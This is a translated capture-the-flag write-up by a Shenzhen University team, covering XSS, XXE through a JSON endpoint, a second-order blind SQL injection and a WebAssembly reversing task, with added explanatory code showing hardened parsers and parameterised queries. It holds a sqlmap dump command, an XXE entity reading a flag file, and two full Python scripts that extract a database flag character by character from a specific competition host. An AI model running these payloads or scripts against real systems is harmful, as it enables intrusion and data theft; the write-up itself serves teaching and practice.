National Chiao Tung University O & M game - Shenzhen University wp

Reposted from Dazhuanlan: https://www.dazhuanlan.com/2019/08/22/5d5e9b211840a/


When we first got the challenges, a bunch of people were going after XSS, so I followed along with XSS.
Stealing the cookie turned out to be useless. Then the login page threw an error,
so I tried injecting based on that error.

Final payload (screenshot not preserved).

After the game I ran it through sqlmap:

python sqlmap.py -r C:1.txt --thread 10  -D bbs -T flag -C flag --dump


EIS{7879f0a27d8bcfcff0bcc837d7641e81}

SimpleExtensionExplorerInjection


The challenge said XXE and gave the file holding the flag plus the source code, but the page submits its data in JSON format.

Reference: https://blog.netspi.com/playing-content-type-xxe-json-endpoints/


Following the article, I constructed the exploit (screenshot not preserved).
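The trick the referenced article describes is that the endpoint picks its parser from the client-supplied Content-Type, so a JSON endpoint turns into an XML endpoint once the header is switched. The following is an added example, not code from the writeup or from the challenge: it models that lenient behaviour next to a hardened handler that fixes the media type server-side and refuses a DOCTYPE before any XML parser sees the body. The request bodies, the handler names and the file path in the entity declaration are constructed assumptions.

```python
import json
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies; assumptions, not traffic captured from the challenge.
JSON_BODY = '{"search": "name", "value": "sample"}'
XML_BODY = ('<?xml version="1.0"?>'
            '<!DOCTYPE r [<!ENTITY ext SYSTEM "file:///flag">]>'
            '<root><search>name</search><value>&ext;</value></root>')


class RequestRejected(Exception):
    """Raised when a request body must not be processed."""


def media_type_of(content_type):
    # "text/xml; charset=utf-8" -> "text/xml"
    return content_type.split(";")[0].strip().lower()


def parse_lenient(content_type, body):
    """Models the weakness the referenced article relies on: the parser is
    chosen from the client's Content-Type, so a JSON endpoint will run an
    XML parser as soon as the header is switched."""
    media_type = media_type_of(content_type)
    if media_type == "application/json":
        return json.loads(body)
    if media_type in ("application/xml", "text/xml"):
        root = ET.fromstring(body)
        return {child.tag: child.text for child in root}
    raise RequestRejected("unsupported media type %r" % media_type)


def parse_strict(content_type, body):
    """Hardened handler: the endpoint's media type is fixed on the server
    side, so the client's header cannot switch the parser."""
    media_type = media_type_of(content_type)
    if media_type != "application/json":
        raise RequestRejected("expected application/json, got %r" % media_type)
    return json.loads(body)


def has_dtd(body):
    """Coarse guard for endpoints that genuinely need XML: refuse anything
    carrying a DOCTYPE, since that is where entity declarations live."""
    return re.search(r"<!DOCTYPE", body, re.IGNORECASE) is not None


def handle(parser, content_type, body):
    """Returns ('ok', parsed) or ('rejected', reason) so the two handlers can
    be compared on the same input."""
    try:
        return "ok", parser(content_type, body)
    except RequestRejected as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    print(handle(parse_lenient, "application/xml", "<root><search>name</search></root>"))
    print(handle(parse_strict, "application/xml", XML_BODY))
    print("DOCTYPE present:", has_dtd(XML_BODY))
```

The strict handler never calls an XML parser at all, which is the cheapest fix for a JSON-only endpoint; has_dtd is the fallback check for endpoints that must accept XML and cannot simply drop the parser.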

SimplePrintEventLogger

For some reason this challenge pointed to the same thing as the previous one: with the XXE from the previous challenge you can read arbitrary files.
Reference: http://drops.xmd5.com/static/drops/tips-5290.html


SimpleServerInjection


Direct reference: https://www.secpulse.com/archives/66934.html

SimpleBlog

This was probably the most thrilling challenge in the web category; a bit of a rant follows.

At the start the challenge exposed an id parameter, and we kept thinking about how to get a second-order injection through it.

Then, when submitting answers in the Final Exam, we found that the score for the same answers was random.

Not until 4 pm did we notice that the username from registration is used again at the scoring step; we guessed the backend runs something like

where username='xxxxxx'

Then, when registering, we found (screenshots not preserved):

Register with

Decade' or if(1,1,pow(6,666666))#

Register with

Decade' or if(0,1,pow(6,666666))#

Only at this point did we realise how the 0 score mentioned in the challenge comes about.

Here is the script:

#! coding:utf-8
# Second-order, error-based blind SQL injection: the registered username is
# spliced into the scoring query, and a pow() overflow turns a wrong guess
# into a query error, which the page reports as "Your grades is 0".

import requests


def main():
    url = "http://210.32.4.20/register.php"
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{}?!:@#$%&()[],. '
    result = ''

    for i in range(1, 50):
        i = str(i)
        for j in chars:
            j = ord(j)
            # Right guess: if() yields 1 and the scoring query succeeds.
            # Wrong guess: pow() overflows and the query errors out.
            username = """decade'or if((ascii(substr((select flag from flag),%s,1))=%s), 1, pow(6,666666666666))#""" % (i, j)
            data = {'username': username,
                    'password': 'aaa',
                    }
            print(username)
            # Retry the registration until the server answers 200.
            do_while = True
            while do_while:
                try:
                    r = requests.post(url, data=data)
                    if r.status_code == 200:
                        do_while = False
                except Exception as e:
                    print(str(e))
            html = login_and_answer(username)
            if 'Your grades is 0' not in html:
                result += chr(j)
                print(result)
                break


def login_and_answer(username):
    # Log in as the freshly registered user and submit one answer so that the
    # server computes the grade (and leaks the oracle through its error handling).
    do_while = True
    while do_while:
        try:
            url = "http://210.32.4.20/login.php"
            data = {'username': username,
                    'password': 'aaa',
                    }
            s = requests.Session()
            r1 = s.post(url, data=data)
            url = 'http://210.32.4.20/answer.php'
            data = {'10.a': 'on'}
            r2 = s.post(url, data=data)
            if r1.status_code == 200 and r2.status_code == 200:
                do_while = False
        except Exception as e:
            print(str(e))
    return r2.text


if __name__ == "__main__":
    main()
# Second script: same idea, with an exp() overflow as the error trigger.
import requests
import string


register_url = "http://210.32.4.20/register.php"
login_url = "http://210.32.4.20/login.php"
answer_url = "http://210.32.4.20/answer.php"

# Candidate characters, delimiters first.
guess = "}{_" + string.digits + string.ascii_letters + "!@#$"


# payload = "1' and if((ascii(substr((select flag from flag limit 0,1),1,1))={}),exp(~(select * from(select user())a)),1)#"


flag = ""
for i in range(1, 50):
    print("round: " + str(i))
    for j in guess:
        print("[+]testing: " + j)
        tmp = ord(j)
        # Here a correct guess makes exp() overflow, so the scoring query fails
        # and the page shows grade 0.
        payload = "1' and if((ascii(substr((select flag from flag),{},1))={}),exp(~(select * from(select user())a)),1)#"
        print(payload.format(i, tmp))
        data1 = {
            "username": payload.format(i, tmp),
            "password": "aaa"
        }
        data2 = {
            "9.d": "on"
        }
        s = requests.session()  # was named `re`, which shadowed the re module
        s.post(register_url, data=data1)
        s.post(login_url, data=data1)
        res = s.post(answer_url, data=data2)
        if "<script>alert('Your grades is 0');</script>" in res.text:
            flag = flag + j
            break
    print("flag: " + flag)
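What made this a second-order injection is that registration stored the username harmlessly and the scoring query later spliced it back into SQL. The following is an added example, not code from the writeup or the challenge: a toy SQLite schema (an assumption; the real backend was MySQL) with the scoring lookup written both the vulnerable way and with a bound parameter, plus a probe that shows the score acting as a boolean oracle over the flag table only in the vulnerable version. Table names, the sample flag value and the function names are constructed.

```python
import sqlite3

# Toy schema standing in for the challenge's backend (constructed assumption).
SCHEMA = """
CREATE TABLE users(username TEXT, password TEXT);
CREATE TABLE grades(username TEXT, score INTEGER);
CREATE TABLE flag(flag TEXT);
INSERT INTO grades VALUES ('alice', 90);
INSERT INTO flag VALUES ('flag{constructed_sample_value}');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def register(conn, username, password):
    # Registration is parameterised: the payload is stored verbatim and does
    # nothing here. The defect is downstream, where the value is reused.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def score_vulnerable(conn, username):
    # Second-order sink: the stored username is spliced into a fresh query,
    # i.e. the `where username='xxxxxx'` the writeup guessed at.
    sql = "SELECT score FROM grades WHERE username='%s'" % username
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return 0  # the app shows "Your grades is 0" when the query fails
    return row[0] if row else 0


def score_safe(conn, username):
    # Same lookup with a bound parameter: the stored string is data, not SQL.
    row = conn.execute("SELECT score FROM grades WHERE username=?", (username,)).fetchone()
    return row[0] if row else 0


def probe(conn, scorer, position, guess):
    """Registers a username carrying a condition on the flag table and reports
    whether the scoring step leaks that condition (True = non-zero score)."""
    username = "decade' OR (SELECT substr(flag,%d,1) FROM flag)='%s" % (position, guess)
    register(conn, username, "aaa")
    # Read the username back from storage, as the app would before grading.
    stored = conn.execute("SELECT username FROM users ORDER BY rowid DESC LIMIT 1").fetchone()[0]
    return scorer(conn, stored) != 0


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, right guess:", probe(db, score_vulnerable, 1, "f"))
    print("vulnerable, wrong guess:", probe(db, score_vulnerable, 1, "x"))
    print("parameterised, right guess:", probe(db, score_safe, 1, "f"))
```

With the bound parameter the injected username simply matches no grade row, so the score is 0 regardless of the condition and the oracle disappears; the registration step did not need to change at all.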


SimpleWasmReverse


This one was obviously a reversing challenge, but as web people we had no clue. We got a flag.wasm file, and because our reverser was careless we didn't solve it on site; after the game pizza showed up and solved it in seconds. Here is the writeup (: runs away)
After getting the wasm, convert it to a C file with the wasm2c tool, compile it to a .o with gcc, and open it in IDA.

In the function list, find the suspicious function check(). A little analysis turns up function f52, a base64 encoding routine, and the string list contains the suspicious string aW9kan40NGgzOTNkNWZoNDtlOjloNmk1OThmNzk4O2dkPDRoZoA=, which is clearly a base64-encoded string. Decoded, it is iodj~44h393d5fh4;e:9h6i598f798;gd<4hf€. Looking further into check(), we find the following code:

while ( v14 != 38 )                               // 38 bytes: the length of the decoded constant
{
    v4 = v14++;
    v5 = i32_load8_s(Z_envZ_memory, v4 + a1);     // read one byte of the input
    f797(v21, (unsigned __int8)(v5 + 3));         // append that byte plus 3
}

As you can see, 3 is added to every byte, so subtracting 3 from each byte of the decoded string gives the flag:

import base64

a = 'aW9kan40NGgzOTNkNWZoNDtlOjloNmk1OThmNzk4O2dkPDRoZoA='
s = ''
a = base64.b64decode(a)          # Python 3: bytes, so each element is already an int
for b in a:
    s += chr((b - 3) & 0xFF)     # undo the +3 applied inside check()
print(s)

That gives the flag.
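To confirm the recovery really inverts the routine rather than just looking plausible, the following added example (not code from the writeup) re-implements the decompiled check() loop in Python from the snippet above and verifies the recovered bytes against it. It assumes, as the writeup's analysis does, that check() compares the transformed input with the base64-decoded constant; the function names are mine.

```python
import base64

# Constant found in the binary's string table (quoted in the writeup above).
ENCODED_TARGET = "aW9kan40NGgzOTNkNWZoNDtlOjloNmk1OThmNzk4O2dkPDRoZoA="
TARGET = base64.b64decode(ENCODED_TARGET)  # 38 bytes, matching `while (v14 != 38)`


def check(candidate):
    """Re-implementation of the decompiled check(): add 3 to each of the 38
    input bytes, truncated to 8 bits as the (unsigned __int8) cast does, and
    compare with the stored constant (assumed comparison target)."""
    if len(candidate) != len(TARGET):
        return False
    transformed = bytes((b + 3) & 0xFF for b in candidate)
    return transformed == TARGET


def recover():
    """Invert the transform: subtract 3 from each byte of the decoded constant."""
    return bytes((b - 3) & 0xFF for b in TARGET)


if __name__ == "__main__":
    flag = recover()
    print(flag.decode("latin-1"))
    print("check() accepts recovered input:", check(flag))
```

The 8-bit wrap matters for the last byte: the decoded constant ends in 0x80, which is not printable, and only after the subtraction does it become the closing brace.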

Summary


We'll try even harder in the next competition. Go Shenzhen University!


Source: www.cnblogs.com/petewell/p/11417858.html